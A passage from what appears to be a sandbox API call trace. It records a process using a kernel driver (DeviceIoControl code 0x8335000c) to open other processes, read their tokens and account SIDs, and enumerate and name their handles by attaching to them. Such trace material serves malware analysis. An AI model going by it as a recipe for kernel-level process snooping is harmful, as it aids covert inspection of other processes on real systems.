(Object=0xffffe0006985a840) returned 0x47fca [0289.939] ObQueryNameString (in: Object=0xffffe00068a45730, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.939] ObfDereferenceObject (Object=0xffffe0006a391d10) returned 0x7ffb [0289.939] IoCompleteRequest () returned 0x0 [0289.939] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.939] PsAcquireProcessExitSynchronization () returned 0x0 [0289.939] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.939] ObReferenceObjectByHandle (in: Handle=0x6bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000685bc8e0, HandleInformation=0x0) returned 0x0 [0289.939] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.939] PsReleaseProcessExitSynchronization () returned 0x2 [0289.939] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fc9 [0289.939] ObQueryNameString (in: Object=0xffffe00068a45730, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.939] ObfDereferenceObject (Object=0xffffe000685bc8e0) returned 0x8000 [0289.939] IoCompleteRequest () returned 0x0 [0289.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x188 [0289.939] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0289.939] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069861080, HandleInformation=0x0) returned 0x0 [0289.939] ObOpenObjectByPointer (in: Object=0xffffe00069861080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000c60) returned 0x0 [0289.939] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x4001d [0289.939] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000c60, DesiredAccess=0x8, TokenHandle=0xffffe000738dc100 | out: TokenHandle=0xffffe000738dc100*=0x18c) returned 0x0 [0289.939] ZwClose (Handle=0xffffffff80000c60) returned 0x0 [0289.940] IoCompleteRequest () returned 0x0 [0289.940] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0289.940] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="LOCAL SERVICE", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0289.941] CloseHandle (hObject=0x18c) returned 1 [0289.941] CloseHandle (hObject=0x188) returned 1 [0289.941] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.941] PsAcquireProcessExitSynchronization () returned 0x0 [0289.941] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400) [0289.941] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069862090, HandleInformation=0x0) returned 0x0 [0289.941] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.941] PsReleaseProcessExitSynchronization () returned 0x2 [0289.941] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x3801b [0289.941] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.941] ObfDereferenceObject (Object=0xffffe00069862090) returned 0x7ffe [0289.941] IoCompleteRequest () returned 0x0 [0289.941] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.941] PsAcquireProcessExitSynchronization () returned 0x0 [0289.941] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400) [0289.941] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069866300, HandleInformation=0x0) returned 0x0 [0289.941] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.941] PsReleaseProcessExitSynchronization () returned 0x2 [0289.941] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x3801a [0289.941] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.941] ObfDereferenceObject (Object=0xffffe00069866300) returned 0x7ffb [0289.941] IoCompleteRequest () returned 0x0 [0289.941] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.941] PsAcquireProcessExitSynchronization () returned 0x0 [0289.941] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400) [0289.941] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069866670, HandleInformation=0x0) returned 0x0 [0289.941] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.941] PsReleaseProcessExitSynchronization () returned 0x2 [0289.941] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38019 [0289.941] ObQueryNameString (in: Object=0xffffe00069866670, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.941] ObfDereferenceObject (Object=0xffffe00069866670) returned 0x7ffe [0289.941] IoCompleteRequest () returned 0x0 [0289.941] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.941] PsAcquireProcessExitSynchronization () returned 0x0 [0289.941] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400) [0289.941] ObReferenceObjectByHandle (in: Handle=0xe8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069294e10, HandleInformation=0x0) returned 0x0 [0289.941] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.941] PsReleaseProcessExitSynchronization () returned 0x2 [0289.941] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38018 [0289.942] ObQueryNameString (in: Object=0xffffe00069294e10, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.942] ObfDereferenceObject (Object=0xffffe00069294e10) returned 0x7ff0 [0289.942] IoCompleteRequest () returned 0x0 [0289.942] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.942] PsAcquireProcessExitSynchronization () returned 0x0 [0289.942] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400) [0289.942] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069e5da80, HandleInformation=0x0) returned 0x0 [0289.942] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.942] PsReleaseProcessExitSynchronization () returned 0x2 [0289.942] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38017 [0289.942] ObQueryNameString (in: Object=0xffffe00069e5da80, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.942] ObfDereferenceObject (Object=0xffffe00069e5da80) returned 0x7fff [0289.942] IoCompleteRequest () returned 0x0 [0289.942] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.942] PsAcquireProcessExitSynchronization () returned 0x0 [0289.942] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400) [0289.942] ObReferenceObjectByHandle (in: Handle=0x1e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fb12b0, HandleInformation=0x0) returned 0x0 [0289.942] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.942] PsReleaseProcessExitSynchronization () returned 0x2 [0289.942] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38016 [0289.942] ObQueryNameString (in: Object=0xffffe00069fb12b0, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.942] ObfDereferenceObject (Object=0xffffe00069fb12b0) returned 0x7ff0 [0289.942] IoCompleteRequest () returned 0x0 [0289.942] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.942] PsAcquireProcessExitSynchronization () returned 0x0 [0289.942] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400) [0289.942] ObReferenceObjectByHandle (in: Handle=0x210, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699e0ae0, HandleInformation=0x0) returned 0x0 [0289.942] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.942] PsReleaseProcessExitSynchronization () returned 0x2 [0289.942] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38015 [0289.942] ObQueryNameString (in: Object=0xffffe000699e0ae0, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.942] ObfDereferenceObject (Object=0xffffe000699e0ae0) returned 0x7b42 [0289.942] IoCompleteRequest () returned 0x0 [0289.942] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.942] PsAcquireProcessExitSynchronization () returned 0x0 [0289.942] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400) [0289.942] ObReferenceObjectByHandle (in: Handle=0x218, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00077debc80, HandleInformation=0x0) returned 0x0 [0289.942] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.942] PsReleaseProcessExitSynchronization () returned 0x2 [0289.942] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38014 [0289.942] ObQueryNameString (in: Object=0xffffe00077debc80, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.942] ObfDereferenceObject (Object=0xffffe00077debc80) returned 0x7ff1 [0289.942] IoCompleteRequest () returned 0x0 [0289.942] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.942] PsAcquireProcessExitSynchronization () returned 0x0 [0289.943] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400) [0289.943] ObReferenceObjectByHandle (in: Handle=0x220, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069ba2b70, HandleInformation=0x0) returned 0x0 [0289.943] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.943] PsReleaseProcessExitSynchronization () returned 0x2 [0289.943] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38013 [0289.943] ObQueryNameString (in: Object=0xffffe00069ba2b70, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.943] ObfDereferenceObject (Object=0xffffe00069ba2b70) returned 0x7fb1 [0289.943] IoCompleteRequest () returned 0x0 [0289.943] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.943] PsAcquireProcessExitSynchronization () returned 0x0 [0289.943] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400) [0289.943] ObReferenceObjectByHandle (in: Handle=0x24c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fcf2f0, HandleInformation=0x0) returned 0x0 [0289.943] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.943] PsReleaseProcessExitSynchronization () returned 0x2 [0289.943] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38012 [0289.943] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.943] ObfDereferenceObject (Object=0xffffe00069fcf2f0) returned 0x7ffd [0289.943] IoCompleteRequest () returned 0x0 [0289.943] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.943] PsAcquireProcessExitSynchronization () returned 0x0 [0289.943] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400) [0289.943] ObReferenceObjectByHandle (in: Handle=0x2c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b94940, HandleInformation=0x0) returned 0x0 [0289.943] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.943] PsReleaseProcessExitSynchronization () returned 0x2 [0289.943] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38011 [0289.943] ObQueryNameString (in: Object=0xffffe00069b94940, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.943] ObfDereferenceObject (Object=0xffffe00069b94940) returned 0x7fec [0289.943] IoCompleteRequest () returned 0x0 [0289.943] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.943] PsAcquireProcessExitSynchronization () returned 0x0 [0289.943] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400) [0289.943] ObReferenceObjectByHandle (in: Handle=0x2c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fccf20, HandleInformation=0x0) returned 0x0 [0289.943] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.943] PsReleaseProcessExitSynchronization () returned 0x2 [0289.943] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38010 [0289.943] ObQueryNameString (in: Object=0xffffe00069fccf20, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.943] ObfDereferenceObject (Object=0xffffe00069fccf20) returned 0x7fef [0289.943] IoCompleteRequest () returned 0x0 [0289.943] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.943] PsAcquireProcessExitSynchronization () returned 0x0 [0289.943] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400) [0289.943] ObReferenceObjectByHandle (in: Handle=0x3ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069377090, HandleInformation=0x0) returned 0x0 [0289.943] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.943] PsReleaseProcessExitSynchronization () returned 0x2 [0289.943] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x3800f [0289.944] ObQueryNameString (in: Object=0xffffe00069377090, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.944] ObfDereferenceObject (Object=0xffffe00069377090) returned 0x7fec [0289.944] IoCompleteRequest () returned 0x0 [0289.944] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.944] PsAcquireProcessExitSynchronization () returned 0x0 [0289.944] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000ac0cf400) [0289.944] ObReferenceObjectByHandle (in: Handle=0x3b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069da6090, HandleInformation=0x0) returned 0x0 [0289.944] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.944] PsReleaseProcessExitSynchronization () returned 0x2 [0289.944] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x3800e [0289.944] ObQueryNameString (in: Object=0xffffe00069da6090, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.944] ObfDereferenceObject (Object=0xffffe00069da6090) returned 0x7fd1 [0289.944] IoCompleteRequest () returned 0x0 [0289.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a4) returned 0x188 [0289.944] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0289.944] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069889080, HandleInformation=0x0) returned 0x0 [0289.944] ObOpenObjectByPointer (in: Object=0xffffe00069889080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000c60) returned 0x0 [0289.944] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x380df [0289.944] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000c60, DesiredAccess=0x8, TokenHandle=0xffffe000738dc100 | out: TokenHandle=0xffffe000738dc100*=0x18c) returned 0x0 [0289.944] ZwClose (Handle=0xffffffff80000c60) returned 0x0 [0289.944] IoCompleteRequest () returned 0x0 [0289.944] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0289.944] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="LOCAL SERVICE", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0289.945] CloseHandle (hObject=0x18c) returned 1 [0289.945] CloseHandle (hObject=0x188) returned 1 [0289.945] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.945] PsAcquireProcessExitSynchronization () returned 0x0 [0289.945] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400) [0289.945] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006986f460, HandleInformation=0x0) returned 0x0 [0289.945] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.945] PsReleaseProcessExitSynchronization () returned 0x2 [0289.945] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300dd [0289.945] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.945] ObfDereferenceObject (Object=0xffffe0006986f460) returned 0x7ffe [0289.945] IoCompleteRequest () returned 0x0 [0289.945] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.945] PsAcquireProcessExitSynchronization () returned 0x0 [0289.945] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400) [0289.945] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006988b340, HandleInformation=0x0) returned 0x0 [0289.945] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.945] PsReleaseProcessExitSynchronization () returned 0x2 [0289.945] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300dc [0289.945] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.945] ObfDereferenceObject (Object=0xffffe0006988b340) returned 0x7ffb [0289.945] IoCompleteRequest () returned 0x0 [0289.945] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.946] PsAcquireProcessExitSynchronization () returned 0x0 [0289.946] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400) [0289.946] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006988cbf0, HandleInformation=0x0) returned 0x0 [0289.946] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.946] PsReleaseProcessExitSynchronization () returned 0x2 [0289.946] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300db [0289.946] ObQueryNameString (in: Object=0xffffe0006988cbf0, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.946] ObfDereferenceObject (Object=0xffffe0006988cbf0) returned 0x7ffe [0289.946] IoCompleteRequest () returned 0x0 [0289.946] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.946] PsAcquireProcessExitSynchronization () returned 0x0 [0289.946] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400) [0289.946] ObReferenceObjectByHandle (in: Handle=0x12c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698b42d0, HandleInformation=0x0) returned 0x0 [0289.946] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.946] PsReleaseProcessExitSynchronization () returned 0x2 [0289.946] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300da [0289.946] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.946] ObfDereferenceObject (Object=0xffffe000698b42d0) returned 0x7ffe [0289.946] IoCompleteRequest () returned 0x0 [0289.946] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.946] PsAcquireProcessExitSynchronization () returned 0x0 [0289.946] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000ac0cf400) [0289.946] ObReferenceObjectByHandle (in: Handle=0x1c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, 